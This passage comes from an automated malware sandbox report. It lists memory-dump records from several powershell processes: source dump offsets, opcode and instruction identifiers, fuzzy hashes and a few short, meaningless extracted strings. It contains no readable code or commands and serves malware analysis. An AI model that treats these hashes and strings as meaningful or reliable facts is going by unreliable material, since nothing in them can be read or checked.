                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7270b79f7a913a045025457eee732b3e5639238e5855669dcf3bc34a2af8e1f8
                                                                                                                                                                                                                      • Instruction ID: 84654229b84f05d7782b87afbebb879f2597359a197f20f59af64cc99c36e8d5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7270b79f7a913a045025457eee732b3e5639238e5855669dcf3bc34a2af8e1f8
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6c3d81f95bafe3b661fa54fae2f1871e8cfa0a8e4d1c48da7622943328e37f62
                                                                                                                                                                                                                      • Instruction ID: 49c9b4e15eac23f24c8ed157fa11e9d2956c6865d20565d6c5b6057da958de66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c3d81f95bafe3b661fa54fae2f1871e8cfa0a8e4d1c48da7622943328e37f62
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44D05E1AB01226576D94E0FE5C807BBA1CE8FC64A1709007B9A09CF281ED40CC0243F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fa5920db5885b68a897fd36762218ff0d3854adc0f5d170c2a7e4ca8f51b0c37
                                                                                                                                                                                                                      • Instruction ID: 1fdf51602e17d3e6116d4d59aef6c26f5937e5973d790aa50e510ecd9059d89a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa5920db5885b68a897fd36762218ff0d3854adc0f5d170c2a7e4ca8f51b0c37
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53E09234D1C34ACB9B04DF64E48A96ABBB4DB96205B0080AADD059B247DA305842CB90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9715b0047c301c1e9789786b624765c94969825cd200eee65bd5169dc92cacea
                                                                                                                                                                                                                      • Instruction ID: 9d64bc72bd6691d4417ddac6357887d4ca7e0995d36a946912c65e83263099de
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9715b0047c301c1e9789786b624765c94969825cd200eee65bd5169dc92cacea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DE0C235740714478615E62EA81085F77DADFC46B2304842EF119CB300DFA4DC068BD5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                      • Instruction ID: 08ea8a4558716ced4ba55ae943c79213748fa2627f6d844f5bc6401c9c2ac6e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78E08631B10014D78B08DA5DD4514EDF7AADFCC220F04807BD90AA7740DA32591587E1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2468ae80f3618c45a480db022a179d6b060030787387baf4f6676bd1369383a3
                                                                                                                                                                                                                      • Instruction ID: e75b725f1fc4b094331ea759985a9992d5f2568bdc5bb18eed6536e8457e0f74
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2468ae80f3618c45a480db022a179d6b060030787387baf4f6676bd1369383a3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45E04F70D50245DE8B80DFB8C58196DFFF0EF48200F10C4AE8908E7311E6318642CB91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                      • Instruction ID: 460972e13b5c665b6a3bc6c73215cc100fea235821e8b5d5e2d3f4d7e021ec32
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85D067B0D04209DF8B80EFADC94156EFBF4EB48204F6085AA8919E7301E7329A52CBD1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b5b0ece4cd094f09fabdea5749c07fa3c063f9394ffb55b64268f42d43c409ec
                                                                                                                                                                                                                      • Instruction ID: 9cf9a69e20cb0636b90f23f7cac3ebbcf6af3aa2158dc7ca80b8770d6d8fc7ea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5b0ece4cd094f09fabdea5749c07fa3c063f9394ffb55b64268f42d43c409ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7D06731814109CBCB08EBA4E85A4BDBB74FA14301F41816DE91793596EF311A9ACAC5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b287edf489b8f6f7db9305f5e5f40c23b2f350ae36ec00f3b474035ce9173378
                                                                                                                                                                                                                      • Instruction ID: 17e50aa201a84a785529a873fabefeb43b7eaafd70121fad3f61829583384574
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b287edf489b8f6f7db9305f5e5f40c23b2f350ae36ec00f3b474035ce9173378
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5D0123090430ACB8B04DF64E44946EBBB5E745200F00815EDA0593745E6305941CFC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0c13bc4a6c0c4361e5c8b91a97122431cb657393fbe973336a36ab28b5aa7e03
                                                                                                                                                                                                                      • Instruction ID: 917079001a336b548c2331f4ae92e7244a2f18543b261da5fdb8822d5248a3c4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c13bc4a6c0c4361e5c8b91a97122431cb657393fbe973336a36ab28b5aa7e03
• Instruction Fuzzy Hash: 8CC012340497858BC7159F74D0988593F50AB0111471109DCD40B0F2B3C9768046DA01
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7c05a732ac0ff853a3f0d1f08f59bde69cc84eeab8eaea26f2393a345b9b3855
• Instruction ID: ee1ae8fb8afb32d6cb533f33c4eb136de6f315f8ac0047cdb619dabbd9220741
• Opcode Fuzzy Hash: 7c05a732ac0ff853a3f0d1f08f59bde69cc84eeab8eaea26f2393a345b9b3855
• Instruction Fuzzy Hash: 0EC0481914FBC49EE313A22548A0142AF311A4741438F02DACA84CFAA3D96E590ACB62
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e47f4c6499d8b8774a1cbf836a3e369b67a3887cbda126f30c7a6c1acb5af13
• Instruction ID: 9deded3325c95f6e2c652d82d268a0b2cc50be3a253a3a983eb8387bb192fabf
• Opcode Fuzzy Hash: 4e47f4c6499d8b8774a1cbf836a3e369b67a3887cbda126f30c7a6c1acb5af13
• Instruction Fuzzy Hash: B9B0923104870D8FC2497F75E4488257329FB4021938008A8E90E0B3A2CE76E88ACA45
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID: xo^$xo^$xo^$xo^$xo^$xo^$xo^$xo^$xo^
• API String ID: 0-874882724
• Opcode ID: 3cf87830c0b79c994e075ddee536b8a290dd8911da8cb78599072ae8f7f8b766
• Instruction ID: aec5743214c4c2d88bb509ef736fe69166802ef39a5955b359c636f9b073072a
• Opcode Fuzzy Hash: 3cf87830c0b79c994e075ddee536b8a290dd8911da8cb78599072ae8f7f8b766
• Instruction Fuzzy Hash: 49A1505251E3C15FD7079B3998E42803FB0AFA72A8B0E40E7C5D4DF1A7D914684AC7A7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
Similarity
• API ID:
• String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
• API String ID: 0-2306644927
• Opcode ID: 9cd9fa5f6988b1c141a0343c1c89017a1a1dde3cc9b5b7d2019629ae9ef1b70e
• Instruction ID: bd2cc7d5d6aba91f2a4801a4fba36ff732ef92e808b7160b3072ca0313c4bf43
• Opcode Fuzzy Hash: 9cd9fa5f6988b1c141a0343c1c89017a1a1dde3cc9b5b7d2019629ae9ef1b70e
• Instruction Fuzzy Hash: 23619CF0A1622EDFEB248E4CC544BAA77B2EB45341F1480D5F8089B290C771DD86EBA1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
• API String ID: 0-3865595929
• Opcode ID: 53e92fba55f55be2ec3f0ba54cb2d92995ee565cf734a829c2a36eb9232a212d
• Instruction ID: 7843dc2c52a12596c36530e2520914f4c88961af619d2bda86bc7d9b6fad416b
• Opcode Fuzzy Hash: 53e92fba55f55be2ec3f0ba54cb2d92995ee565cf734a829c2a36eb9232a212d
• Instruction Fuzzy Hash: 73A158F17053258FE7249B68C80476ABBE2EFC6311F1484BAE54ECB391CA39C886D751
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$4'^q$4'^q$piTk$tP^q$tP^q
• API String ID: 0-3346979675
• Opcode ID: 708f28817fa31b76497c07850feed61517dd5d5b1ffc6dd4d2ed6bd722827400
• Instruction ID: c3d32cbd18e523c56b368fcb13b7b86837b26e2def051867127ceb37511b7245
• Opcode Fuzzy Hash: 708f28817fa31b76497c07850feed61517dd5d5b1ffc6dd4d2ed6bd722827400
• Instruction Fuzzy Hash: EBD126F5B0522E8FDB249B6C84006AABBE2EFC5311F1584FAD51DCB251DB31C886D791
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
Similarity
• API ID:
• String ID: fcq$4'^q$4'^q$4'^q$4'^q
• API String ID: 0-2717029046
• Opcode ID: 3b08c8a9b114474464119322d8bee2740196068e00c3c2e99704d33ab89c4658
• Instruction ID: 4f4c0bb8e761eea575c201b3c15764ca9544c32839b125f119a63ed4afcc1751
• Opcode Fuzzy Hash: 3b08c8a9b114474464119322d8bee2740196068e00c3c2e99704d33ab89c4658
• Instruction Fuzzy Hash: A7F179B17053258FE725AB6894147AABBA2EFC1311F14C4BBD50DCF252CB31D886D7A2
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q$$^q
• API String ID: 0-3272787073
• Opcode ID: df59cbdfa857bde60597efd006a7ca2ed7a0fa5dfd01dc44f69f4a67e17b1461
• Instruction ID: ac494f58847111e95513745666b7946920d02a4eea6a182a9143144b2af2a473
• Opcode Fuzzy Hash: df59cbdfa857bde60597efd006a7ca2ed7a0fa5dfd01dc44f69f4a67e17b1461
• Instruction Fuzzy Hash: 795157F17053269BEB246A698404766BBE2EFC6311F1484BBC40DCF251DF39C886D792
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID: `_q$`_q$`_q$`_q
• API String ID: 0-3297199963
• Opcode ID: ad19a19726a224c32ee4d05cf2eeac759cc7189e76e66edf9f9b52fb6038978a
• Instruction ID: 88c2aaf30559b99ab2a456bcb6df16b3cff91b6c39c8a960f73ebd5526840c89
• Opcode Fuzzy Hash: ad19a19726a224c32ee4d05cf2eeac759cc7189e76e66edf9f9b52fb6038978a
• Instruction Fuzzy Hash: F7B1B374A003199FDB54DFA9D980A9DBBF2FF88301F14862AE819AB344D770A9458F90
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2151238956.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
Similarity
• API ID:
• String ID: `_q$`_q$`_q$`_q
• API String ID: 0-3297199963
• Opcode ID: 4fa15e4eafe84cf8bc1fa764d76c5206ca458f12ace5e50dcd89828df3db4569
• Instruction ID: af1f5128d4c5c03b05876cc2dfc034faf059bf7d4b11efd7e0eb2fbce768710e
• Opcode Fuzzy Hash: 4fa15e4eafe84cf8bc1fa764d76c5206ca458f12ace5e50dcd89828df3db4569
• Instruction Fuzzy Hash: 17B18574E003199FDB54DFA9D980A9DFBF2FF48301F14862AE819AB354DB70A9458F90
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
Similarity
• API ID:
                                                                                                                                                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-2125118731
                                                                                                                                                                                                                      • Opcode ID: 5f029cdc5e0aa83bc0a4bf89ced65d3d3d66dd9caa2b1a6aa0accda7ca02e52b
                                                                                                                                                                                                                      • Instruction ID: fc451fffc36c5342228590e57d612636bbc9ebd76b66e527bda2d95e348227d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f029cdc5e0aa83bc0a4bf89ced65d3d3d66dd9caa2b1a6aa0accda7ca02e52b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20215AF170132697FB3469298804B3777D69FC0711F2488AA990DCF385DDB1D8569361
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2178811248.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7b20000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                      • API String ID: 0-2049395529
                                                                                                                                                                                                                      • Opcode ID: 708f5928bc848423ad1a56ef6a693471e3689832720f3e54bc9f1d2e713d0d0c
                                                                                                                                                                                                                      • Instruction ID: db84d01e928d38e785c9f8af90b31df0a08890459df851fcfccd171effbe6ac6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 708f5928bc848423ad1a56ef6a693471e3689832720f3e54bc9f1d2e713d0d0c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69017DA1B1D7668FC72E232C58202556FF25F87A41B1949E7C848CF797CE168C4E8397
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2361180305.00000000040BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 040BD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_40bd000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 09c68d6c8ba8c5cfbb7f7e3a9cf69bf296a481559ec800c72751fd6e827d215b
                                                                                                                                                                                                                      • Instruction ID: d18cc4e2797871657137bc7505dcca970e4124f6d40939ac30aaf578b64e05df
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09c68d6c8ba8c5cfbb7f7e3a9cf69bf296a481559ec800c72751fd6e827d215b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C501F7711057409AE7508E15EC84BA6FFD8DF51325F18C419ED8C1B242C679A841D6F5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2361180305.00000000040BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 040BD000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_40bd000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 93fb235b60f23a1c2e7610d86a88092d48a686fcbc767ecf0ee63b3f08fc74db
                                                                                                                                                                                                                      • Instruction ID: e68d61af2c71a0fe088a7cec7d8920605ee6b9ee6c3e6c0043e095b1e317785e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93fb235b60f23a1c2e7610d86a88092d48a686fcbc767ecf0ee63b3f08fc74db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8801527200E3C09ED7128B25DC94B52BFB4DF53224F1980CBD9889F1A7C2695848D7B2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2361855237.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4240000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b24dbbe1f3160ec8d098a7a0b2fb682c60cc9f91cabe4624165855072928b211
                                                                                                                                                                                                                      • Instruction ID: 640e80e0c1bbd960799821239730feeecb6a74a4bdcc57f8fcd29e436ff48270
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b24dbbe1f3160ec8d098a7a0b2fb682c60cc9f91cabe4624165855072928b211
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36F0DA35A001059FCB15CF9DD890AEEF7B1FF88324F248159E515A72A1C736EC52CB60
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9014621a80432e1aef1cfcd6cad1c22f7962ec34cae45a630ca22aad9a09383f
                                                                                                                                                                                                                      • Instruction ID: 0ec570db7ba736e55a1f96b28ea9539a48643b7bead3a8dca3678891480f1028
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9014621a80432e1aef1cfcd6cad1c22f7962ec34cae45a630ca22aad9a09383f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97914F71F007159BDB1AEBB4C8146AFBBE3EF84604B04895DD14AAB340DF785D0A8BD6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4dfa822c9b15a89f8d1b87c5b18921321612c8b36f331b1f67d18b56778076de
                                                                                                                                                                                                                      • Instruction ID: dc1f613e4b2944ccdf397d27f6c2b8aeaea44f58b150e8fa4be75f20c7d2cbf0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dfa822c9b15a89f8d1b87c5b18921321612c8b36f331b1f67d18b56778076de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5913E71F007159BDB1AEBA4C8146AFB7E3EF84604B04895DD14AAB340DF786D0A8BD6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$piTk$piTk$piTk$piTk$piTk$|,Vk
                                                                                                                                                                                                                      • API String ID: 0-1171896915
                                                                                                                                                                                                                      • Opcode ID: c5a87d119b0f7dc3fd57bf608e8fbbce0c07fa31669351d0e701cb5f7907efd4
                                                                                                                                                                                                                      • Instruction ID: 5a1d1d5eaa983bd3858c79700f551d524c84af69eca3956e4d16131ffd7aaa66
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5a87d119b0f7dc3fd57bf608e8fbbce0c07fa31669351d0e701cb5f7907efd4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E223AF1B00216DFEB249B6885417AFBBE5BF85351F0484BADA0DCB241DB31D945CBA2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.2351547269.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_73f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                      • API String ID: 0-1420252700
                                                                                                                                                                                                                      • Opcode ID: b0a7aad1a5e8469ca19ce89b4ab5273966e2872708e8eb4938b400b0ba0cd775
                                                                                                                                                                                                                      • Instruction ID: 96fca62e4c5befe976911ddd52302cdb750ab9f4b8fb07431ff37bb3c27a7f3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0a7aad1a5e8469ca19ce89b4ab5273966e2872708e8eb4938b400b0ba0cd775
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A1267F17002559FEB258B68891077BBBE29FD1391F14887ADA09CB351DB32DC85C7A2
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID: (bq
• API String ID: 0-149360118
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID: (&^q
• API String ID: 0-2067289071
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000E.00000002.2326635499.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2d30000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
